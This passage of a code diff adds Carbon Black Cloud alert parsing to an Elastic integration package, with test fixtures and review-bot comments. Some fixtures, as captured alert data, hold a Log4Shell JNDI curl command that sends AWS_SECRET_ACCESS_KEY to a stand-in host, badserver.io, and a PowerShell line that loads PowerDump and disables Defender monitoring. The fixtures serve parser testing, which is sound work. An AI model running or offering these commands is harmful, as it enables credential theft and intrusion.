Windows"],"parent_guid":"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275","parent_pid":1916,"parent_name":"c:\\windows\\system32\\svchost.exe","parent_sha256":"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3","parent_md5":"145dcf6706eeea5b066885ee17964c09","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule","parent_username":"NT AUTHORITY\\SYSTEM","childproc_guid":"","childproc_username":"","childproc_cmdline":"","ml_classification_final_verdict":"NOT_ANOMALOUS","ml_classification_global_prevalence":"LOW","ml_classification_org_prevalence":"LOW","ml_classification_anomalies":[]}],"num_found":1,"num_available":1} - path: /integrationServices/v3/auditlogs methods: ["GET"] responses: diff --git a/packages/carbon_black_cloud/changelog.yml b/packages/carbon_black_cloud/changelog.yml index 7f2e98d0eb6..028a2ddfd82 100644 --- a/packages/carbon_black_cloud/changelog.yml +++ b/packages/carbon_black_cloud/changelog.yml 
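Review bot: The added v7 alert fixture looks like a capture from a live tenant rather than synthetic data: it carries a public `device_external_ip` of `75.98.230.194` together with an `org_key`, device, watchlist and process identifiers. The other fixtures on this page use documentation-style addresses (`81.2.69.x`), and the same scrub would be appropriate here before the sample ships with the package; confirm the identifiers are not from a real deployment. The response body is also one very long line, which makes future changes to the mock hard to review, so consider splitting it with a block scalar.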
@@ -1,4 +1,37 @@ # newer versions go on top +- version: "2.0.0" + changes: + - description: Added v7 alert data stream with dashboards along with new CEL input type for all http data streams. + type: enhancement + link: https://github.com/elastic/integrations/pull/9467 +- version: "1.21.3" + changes: + - description: Added support for more device_timestamp formats. + type: bugfix + link: https://github.com/elastic/integrations/pull/9391 +- version: "1.21.2" + changes: + - description: Fixed handling of @timestamp in endpoint event data stream. + type: bugfix + link: https://github.com/elastic/integrations/pull/9380 +- version: "1.21.1" + changes: + - description: Fix handling of network direction. + type: bugfix + link: https://github.com/elastic/integrations/pull/9340 +- version: "1.21.0" + changes: + - description: Introduced data stream specific SQS queues. + type: enhancement + link: https://github.com/elastic/integrations/pull/9303 + - description: Fixed data loss issue by providing option for local SQS queues. + type: bugfix + link: https://github.com/elastic/integrations/pull/9303 +- version: "1.20.0" + changes: + - description: Set sensitive values as secret and add missing mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.19.1" changes: - description: Changed owners diff --git a/packages/carbon_black_cloud/data_stream/alert/agent/stream/aws-s3.yml.hbs b/packages/carbon_black_cloud/data_stream/alert/agent/stream/aws-s3.yml.hbs index 26c4d05045f..017d6e7fe37 100644 --- a/packages/carbon_black_cloud/data_stream/alert/agent/stream/aws-s3.yml.hbs +++ b/packages/carbon_black_cloud/data_stream/alert/agent/stream/aws-s3.yml.hbs @@ -15,7 +15,9 @@ bucket_list_prefix: {{bucket_list_prefix}} {{else}} -{{#if queue_url}} +{{#if queue_url_alert}} +queue_url: {{queue_url_alert}} +{{else if queue_url}} queue_url: {{queue_url}} {{/if}} {{#if visibility_timeout}} 
diff --git a/packages/carbon_black_cloud/data_stream/alert/agent/stream/httpjson.yml.hbs b/packages/carbon_black_cloud/data_stream/alert/agent/stream/httpjson.yml.hbs index 0371e9b2f03..235d7824cec 100644 --- a/packages/carbon_black_cloud/data_stream/alert/agent/stream/httpjson.yml.hbs +++ b/packages/carbon_black_cloud/data_stream/alert/agent/stream/httpjson.yml.hbs @@ -1,6 +1,8 @@ config_version: 2 interval: {{interval}} -request.timeout: 2m +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} request.method: POST {{#if enable_request_tracer}} request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" diff --git a/packages/carbon_black_cloud/data_stream/alert/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/alert/elasticsearch/ingest_pipeline/default.yml index 228a44bebba..64f57bf0667 100644 --- a/packages/carbon_black_cloud/data_stream/alert/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbon_black_cloud/data_stream/alert/elasticsearch/ingest_pipeline/default.yml @@ -30,7 +30,7 @@ processors: field: json.create_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: field: json.last_update_time target_field: carbon_black_cloud.alert.last_update_time @@ -42,7 +42,7 @@ processors: field: json.last_update_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: alert 
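Review bot: Wrapping `request.timeout` in `{{#if http_client_timeout}}` means an operator who clears the new `http_client_timeout` var gets no `request.timeout` line at all, so the input's built-in default applies instead of the previous fixed `2m`; the var's description in the alert manifest lists the valid units but not this fallback. A short addition there, e.g. `If left empty, the input's default timeout is used.`, would make the behaviour explicit.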
@@ -61,7 +61,7 @@ processors: field: json.first_event_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: field: json.last_event_time target_field: event.end @@ -73,7 +73,7 @@ processors: field: json.last_event_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.severity target_field: event.severity @@ -84,7 +84,7 @@ processors: field: json.severity - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.reason target_field: event.reason @@ -275,7 +275,7 @@ processors: field: json.count - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.notes_present target_field: carbon_black_cloud.alert.notes_present @@ -286,7 +286,7 @@ processors: field: json.notes_present - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.ioc_id target_field: carbon_black_cloud.alert.ioc.id 
@@ -326,7 +326,7 @@ processors: field: carbon_black_cloud.alert.workflow.last_update_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - remove: field: event.original if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) @@ -380,4 +380,4 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/alert/manifest.yml b/packages/carbon_black_cloud/data_stream/alert/manifest.yml index d5d4c58ad08..7521479232a 100644 --- a/packages/carbon_black_cloud/data_stream/alert/manifest.yml +++ b/packages/carbon_black_cloud/data_stream/alert/manifest.yml @@ -22,6 +22,14 @@ streams: multi: false required: true show_user: true + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: true + default: 2m - name: tags type: text title: Tags @@ -52,6 +60,15 @@ streams: description: Collect alerts from Carbon Black Cloud. template_path: aws-s3.yml.hbs vars: + - name: queue_url_alert + type: text + title: "[Alert][SQS] Queue URL" + multi: false + required: false + show_user: true + description: |- + URL of the AWS SQS queue that messages will be received from. This is only required if you want to collect logs via AWS SQS. + This is an alert data stream specific queue URL. This will override the global queue URL if provided. - name: bucket_list_prefix type: text title: "[S3] Bucket Prefix" 
@@ -106,8 +123,8 @@ streams: required: false show_user: false default: | - - regex: "alert_logs/" - description: If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. This is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. If file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. Regexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed. + # - regex: "alert_logs/" + description: "If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. \nThis is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. \nIf file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. \nRegexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed.\n[NOTE]: It is recommended to use data stream specific SQS queues instead of file_selectors to avoid data loss." - name: tags type: text title: Tags diff --git a/packages/carbon_black_cloud/data_stream/alert/sample_event.json b/packages/carbon_black_cloud/data_stream/alert/sample_event.json index 3f1c2b77f5f..5e563c6284e 100644 --- a/packages/carbon_black_cloud/data_stream/alert/sample_event.json +++ b/packages/carbon_black_cloud/data_stream/alert/sample_event.json 
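Review bot: The new `file_selectors` default is a block scalar whose only content is the YAML comment `# - regex: "alert_logs/"`, so the variable now carries a non-empty string that renders as a comment rather than an empty list; whether `aws-s3.yml.hbs` treats that as "no selectors" cannot be confirmed from this hunk. Functionally the alert stream no longer restricts the shared queue to `alert_logs/` keys, so an existing policy that relies on the global `queue_url` and the old default will start downloading every object in that queue, which is the situation the added [NOTE] warns about. If dropping the default is intended, leave `default` empty and keep the example regex in the description; if the filter is still meant to apply out of the box, restore `- regex: "alert_logs/"` uncommented.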
@@ -99,4 +99,4 @@ "user": { "name": "test34@demo.com" } -} +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log new file mode 100644 index 00000000000..01bb258cc09 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log 
@@ -0,0 +1 @@ +{"version":"2.0.0","org_key":"ABCD1234","alert_url":"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c","id":"ca316d99-a808-3779-8aab-62b2b6d9541c","type":"INTRUSION_DETECTION_SYSTEM","is_updated":false,"detection_timestamp":"2023-02-03T17:22:03.945Z","first_event_timestamp":"2023-02-03T17:22:03.945Z","last_event_timestamp":"2023-02-03T17:22:03.945Z","severity":1,"reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. curl.exe made a HTTP/80 connection to 81.2.69.142 from 10.203.105.21","threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017","primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17","workflow":{"status":"OPEN","change_timestamp":"2023-02-03T17:27:33.007Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON"},"alert_notes_present":false,"policy_applied":"NOT_APPLIED","run_state":"RAN","rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D","rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857","reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857","sensor_action":"ALLOW","device_target_value":"MEDIUM","device_policy_id":165700,"device_policy":"Standard","device_id":17482451,"device_name":"DEV01-39X-1","device_os":"WINDOWS","device_os_version":"Windows 10 x64","device_username":"DemoMachine","device_location":"UNKNOWN","device_external_ip":"66.170.99.2","device_internal_ip":"10.203.105.21","netconn_remote_port":80,"netconn_local_port":49233,"netconn_remote_domain":"google.com","netconn_remote_ip":"81.2.69.142","netconn_local_ip":"10.203.105.21","netconn_remote_ipv4":"81.2.69.142","netconn_local_ipv4":"10.203.105.21","attack_tactic":"TA0001","attack_technique":"T1190","tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214","threat_name":"CVE-2021-44228 
Exploit","process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0","process_pid":5780,"process_name":"c:\\windows\\system32\\curl.exe","process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4","process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1","process_reputation":"TRUSTED_WHITE_LIST","process_effective_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids","process_username":"DEV01-39X-1\\bit9qa","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft Windows"],"parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a","parent_pid":8796,"parent_name":"c:\\windows\\system32\\cmd.exe","parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450","parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee","parent_reputation":"TRUSTED_WHITE_LIST","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ","parent_username":"DEV01-39X-1\\bit9qa","mdr_alert_notes_present":false,"mdr_alert":false} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log-expected.json b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log-expected.json new file mode 100644 index 00000000000..e676511f4ee --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log-expected.json 
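Review bot: The fixture's `device_external_ip` is `66.170.99.2`, a routable public address, while the rest of the same event already uses the GeoIP test address `81.2.69.142`; sample data committed to the package should stick to reserved documentation ranges (RFC 5737: 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or that existing test address so expected files and sample events never point at a real host. The `${jndi:ldap://...}` command line is a useful escaping case, and its round-trip into `event.original` and `process.command_line` looks correct in the expected output that follows.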
@@ -0,0 +1,154 @@ +{ + "expected": [ + { + "@timestamp": "2023-02-03T17:22:03.945Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "attack_tactic": "TA0001", + "attack_technique": "T1190", + "category": "THREAT", + "device": { + "external_ip": "66.170.99.2", + "internal_ip": "10.203.105.21", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "Standard", + "policy_id": 165700, + "target_value": "MEDIUM" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false + }, + "netconn": { + "local_ip": "10.203.105.21", + "local_ipv4": "10.203.105.21", + "local_port": 49233, + "remote_domain": "google.com", + "remote_ip": "81.2.69.142", + "remote_ipv4": "81.2.69.142", + "remote_port": 80 + }, + "organization_key": "ABCD1234", + "parent": { + "cmdline": "\"C:\\WINDOWS\\system32\\cmd.exe\" ", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a", + "hash": { + "md5": "8a2122e8162dbef04694b9c3e0b6cdee", + "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450" + }, + "name": "c:\\windows\\system32\\cmd.exe", + "pid": 8796, + "reputation": "TRUSTED_WHITE_LIST", + "username": "DEV01-39X-1\\bit9qa" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "21AB6B27-9F72-11ED-A79A-005056A53F17", + "process": { + "cmdline": "curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0", + "hash": { + "md5": "eac53ddafb5cc9e780a7cc086ce7b2b1", + "sha256": "d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\curl.exe", + "pid": 5780, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "DEV01-39X-1\\bit9qa" + }, + "reason_code": 
"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857", + "rule_category_id": "DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D", + "rule_id": "B5974D4D-265E-4FAF-8F71-2F76AAD67857", + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017", + "threat_name": "CVE-2021-44228 Exploit", + "tms_rule_id": "4b98443a-ba0d-4ff5-b99e-e5e70432a214", + "type": "INTRUSION_DETECTION_SYSTEM", + "url": "https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c", + "version": "2.0.0", + "workflow": { + "change_timestamp": "2023-02-03T17:27:33.007Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-02-03T17:22:03.945Z", + "id": "ca316d99-a808-3779-8aab-62b2b6d9541c", + "kind": "alert", + "original": "{\"version\":\"2.0.0\",\"org_key\":\"ABCD1234\",\"alert_url\":\"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c\",\"id\":\"ca316d99-a808-3779-8aab-62b2b6d9541c\",\"type\":\"INTRUSION_DETECTION_SYSTEM\",\"is_updated\":false,\"detection_timestamp\":\"2023-02-03T17:22:03.945Z\",\"first_event_timestamp\":\"2023-02-03T17:22:03.945Z\",\"last_event_timestamp\":\"2023-02-03T17:22:03.945Z\",\"severity\":1,\"reason\":\"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. 
curl.exe made a HTTP/80 connection to 81.2.69.142 from 10.203.105.21\",\"threat_id\":\"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017\",\"primary_event_id\":\"21AB6B27-9F72-11ED-A79A-005056A53F17\",\"workflow\":{\"status\":\"OPEN\",\"change_timestamp\":\"2023-02-03T17:27:33.007Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\"},\"alert_notes_present\":false,\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"rule_category_id\":\"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D\",\"rule_id\":\"B5974D4D-265E-4FAF-8F71-2F76AAD67857\",\"reason_code\":\"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857\",\"sensor_action\":\"ALLOW\",\"device_target_value\":\"MEDIUM\",\"device_policy_id\":165700,\"device_policy\":\"Standard\",\"device_id\":17482451,\"device_name\":\"DEV01-39X-1\",\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 10 x64\",\"device_username\":\"DemoMachine\",\"device_location\":\"UNKNOWN\",\"device_external_ip\":\"66.170.99.2\",\"device_internal_ip\":\"10.203.105.21\",\"netconn_remote_port\":80,\"netconn_local_port\":49233,\"netconn_remote_domain\":\"google.com\",\"netconn_remote_ip\":\"81.2.69.142\",\"netconn_local_ip\":\"10.203.105.21\",\"netconn_remote_ipv4\":\"81.2.69.142\",\"netconn_local_ipv4\":\"10.203.105.21\",\"attack_tactic\":\"TA0001\",\"attack_technique\":\"T1190\",\"tms_rule_id\":\"4b98443a-ba0d-4ff5-b99e-e5e70432a214\",\"threat_name\":\"CVE-2021-44228 Exploit\",\"process_guid\":\"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0\",\"process_pid\":5780,\"process_name\":\"c:\\\\windows\\\\system32\\\\curl.exe\",\"process_sha256\":\"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4\",\"process_md5\":\"eac53ddafb5cc9e780a7cc086ce7b2b1\",\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_cmdline\":\"curl -H \\\"Host: 
\\\\${jndi:ldap://\\\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\\\" http://google.com/testingids\",\"process_username\":\"DEV01-39X-1\\\\bit9qa\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_publisher\":[\"Microsoft Windows\"],\"parent_guid\":\"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a\",\"parent_pid\":8796,\"parent_name\":\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"parent_sha256\":\"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450\",\"parent_md5\":\"8a2122e8162dbef04694b9c3e0b6cdee\",\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_cmdline\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\"parent_username\":\"DEV01-39X-1\\\\bit9qa\",\"mdr_alert_notes_present\":false,\"mdr_alert\":false}", + "reason": "HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. curl.exe made a HTTP/80 connection to 81.2.69.142 from 10.203.105.21", + "severity": 1, + "start": "2023-02-03T17:22:03.945Z" + }, + "host": { + "hostname": "DEV01-39X-1", + "id": "17482451", + "name": "DEV01-39X-1", + "os": { + "type": "windows", + "version": "Windows 10 x64" + } + }, + "process": { + "command_line": "curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids", + "entity_id": "ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0", + "executable": "c:\\windows\\system32\\curl.exe", + "hash": { + "md5": "eac53ddafb5cc9e780a7cc086ce7b2b1", + "sha256": "d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4" + }, + "name": "curl.exe", + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" ", + "entity_id": "ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a", + "executable": "c:\\windows\\system32\\cmd.exe", + "hash": { + "md5": "8a2122e8162dbef04694b9c3e0b6cdee", + "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450" + }, + "name": "cmd.exe", + "pid": 
8796 + }, + "pid": 5780 + }, + "related": { + "hash": [ + "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", + "8a2122e8162dbef04694b9c3e0b6cdee", + "d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4", + "eac53ddafb5cc9e780a7cc086ce7b2b1" + ], + "hosts": [ + "DEV01-39X-1" + ], + "user": [ + "DemoMachine" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "DemoMachine" + } + } + ] +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log new file mode 100644 index 00000000000..c0e7a94eb97 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-cb-analytics.log 
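Review bot: The expected output carries `attack_tactic: TA0001` and `attack_technique: T1190` only under `carbon_black_cloud.alert.*`, and the `event` object has `kind: alert` but neither `event.category` nor `event.type`, so ECS consumers (detection rules, the Security app) cannot key on the MITRE data or the event taxonomy. Presumably the pipeline, which is outside this diff, should also populate `threat.tactic.id` and `threat.technique.id` from those two fields and set an `event.category` such as `intrusion_detection` for `INTRUSION_DETECTION_SYSTEM` alerts; the cb-analytics expected output below has the same gap for its `attack_tactic: TA0002`. If that mapping is intentionally deferred, a short note in the data stream's field documentation would save the next reader the same check.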
@@ -0,0 +1,2 @@ +{"org_key":"ABCD1234","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234","id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1","type":"CB_ANALYTICS","backend_timestamp":"2023-07-17T17:16:50.960Z","user_update_timestamp":null,"backend_update_timestamp":"2023-07-17T17:29:19.996Z","detection_timestamp":"2023-07-17T17:15:51.708Z","first_event_timestamp":"2023-07-17T17:15:33.396Z","last_event_timestamp":"2023-07-17T17:27:59.192Z","severity":5,"reason":"A known virus (HackTool: Powerpuff) was detected running.","reason_code":"T_REP_VIRUS","threat_id":"9e0afc389c1acc43b382b1ba590498d2","primary_event_id":"94953e4524c511ee86284f0541a5184d","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2023-07-17T17:16:50.960Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2023-07-17T17:16:50.960Z","value":"NONE","changed_by_type":null,"changed_by":null},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":true,"device_id":6948863,"device_name":"demodevice","device_uem_id":"","device_target_value":"MISSION_CRITICAL","device_policy":"SSQ_Policy","device_policy_id":112221,"device_os":"WINDOWS","device_os_version":"Windows Server 2019 
x64","device_username":"sample@demoorg.com","device_location":"OFFSITE","device_external_ip":"1.2.3.4","device_internal_ip":"4.3.2.1","mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"ttps":["MALWARE_APP","RUN_MALWARE_APP","MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER","FILELESS","MITRE_T1059_001_POWERSHELL"],"attack_tactic":"","attack_technique":"","process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73","process_pid":3600,"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1","process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0","process_md5":"42a80cc2333b612b63a859f17474c9af","process_effective_reputation":"KNOWN_MALWARE","process_reputation":"KNOWN_MALWARE","process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}","process_username":"demodevice\\Administrator","process_issuer":[],"process_publisher":[],"parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed","parent_pid":4024,"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"","parent_username":"demodevice\\Administrator","childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000","childproc_name":"","childproc_sha256":"","childproc_md5":"","childproc_effective_reputation":"RESOLVING","childproc_username":"demodevice\\Administrator","childproc_cmdline":""} 
+{"version":"2.0.0","org_key":"ABCD1234","alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1","id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1","type":"CB_ANALYTICS","is_updated":true,"detection_timestamp":"2023-07-17T17:15:51.708Z","backend_timestamp":"2023-07-17T17:16:50.960Z","backend_update_timestamp":"2023-07-17T17:18:03.397Z","first_event_timestamp":"2023-07-17T17:15:33.396Z","last_event_timestamp":"2023-07-17T17:15:33.396Z","severity":5,"reason":"A known virus (HackTool: Powerpuff) was detected running.","threat_id":"9e0afc389c1acc43b382b1ba590498d2","primary_event_id":"94953e4524c511ee86284f0541a5184d","workflow":{"status":"OPEN","change_timestamp":"2023-07-17T17:16:50.960Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON"},"determination":{"value":"NONE","change_timestamp":"2023-07-17T17:16:50.960Z"},"alert_notes_present":false,"policy_applied":"NOT_APPLIED","run_state":"RAN","reason_code":"T_REP_VIRUS","sensor_action":"ALLOW","device_target_value":"MISSION_CRITICAL","device_policy_id":112221,"device_policy":"SSQ_Policy","device_id":6948863,"device_name":"Kognos-W19-CB-3","device_os":"WINDOWS","device_os_version":"Windows Server 2019 